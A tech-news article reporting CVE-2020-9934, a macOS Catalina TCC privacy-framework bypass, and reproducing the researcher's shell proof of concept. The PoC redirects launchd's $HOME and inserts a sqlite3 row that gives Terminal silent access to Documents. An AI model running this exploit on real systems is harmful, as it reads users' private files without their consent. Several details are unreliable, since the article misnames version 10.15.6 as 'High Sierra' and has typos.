Apple’s macOS 10.15.5 TCC Framework bug allowed any hacker to access confidential user data

0

Apple macOS Catalina 10.15.5 CVE-2020–9934 Transparency, Consent, and Control (TCC) Framework vulnerability allowed unauthorized access to sensitive user data

Security researcher, Matt Shockley has discovered a TCC Framework vulnerability in Apple’s macOS Catalina 10.15.5 which could have allowed an unauthorized hacker to access sensitive user data. The vulnerability has since been patched in Apple macOS High Sierra 10.15.6.

The Transparency, Consent, and Control (TCC) Framework vulnerability was issued a unique identifier, CVE-2020-9934, and had a severity score of 4/10. The vulnerability was so simple to execute that it didn’t need a pro-efficient hacking/programming knowledge.

Transparency, Consent, and Control (TCC) Framework vulnerability CVE-2020-9934 in macOS Catalina

The Transparency, Consent, and Control (TCC) Framework is an Apple subsystem which denies installed applications access to ‘sensitive’ user data without explicit permission from the user (generally in the form of a pop-up message). Though the TCC Framework exists on both macOS and iOS, Shockley found that the bug could only be exploited on the macOS version.

If an application attempts to access files in a directory protected by TCC without user authorization, the file operation will fail. However, Shockley found that the TCC can be manipulated into thinking it has permissions and will allow a local user to access confidential macOS owners’ information.

Shockley found that since the TCC daemon is running via launchd within the current user’s domain, he could also control all environment variables passed to it when launched.  He could set the $HOME environment variable in launchctl to point to a directory in his control and restarted the TCC daemon. Once TCC daemon restarted he could directly modify the TCC database to give him privilege access rights without the user’s knowledge.

Shockley says that the bug works because it doesn’t actually modify the SIP-protected TCC database. It just exploits the bug in the handling of environment variables.

Proof of Concept for CVE-2020-9934

# reset database just in case (no cheating!)
$> tccutil reset All
# mimic TCC’s directory structure from ~/Library
$> mkdir -p “/tmp/tccbypass/Library/Application Support/com.apple.TCC”
# cd into the new directory
$> cd “/tmp/tccbypass/Library/Application Support/com.apple.TCC/”
# set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass
# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd
# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db “INSERT INTO access
VALUES(‘kTCCServiceSystemPolicyDocumentsFolder’,
‘com.apple.Terminal’, 0, 1, 1,
X’fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003′,
NULL,
NULL,
‘UNUSED’,
NULL,
NULL,
1333333333333337);”
# list Documents directory without prompting the end user
$> ls ~/Documents

Shockley has made a Swift writeup of the PoC on his GitHub. Shockley informed the Apple security team about the vulnerability on 26 Feb 2020 and Apple released the macOS High Sierra version 10.15.6 on 15 Jul 2020 to patch this simple yet powerful variables flaw. 

Apple’s macOS 1015.5 Catalina run PCs and laptops are still vulnerable to this bug.

Share.

About Author

"The Internet is the first thing that humanity has built that humanity doesn't understand, the largest experiment in anarchy that we have ever had." Eric Schmidt

Subscribe
Notify of
0 Comments
Inline Feedbacks
View all comments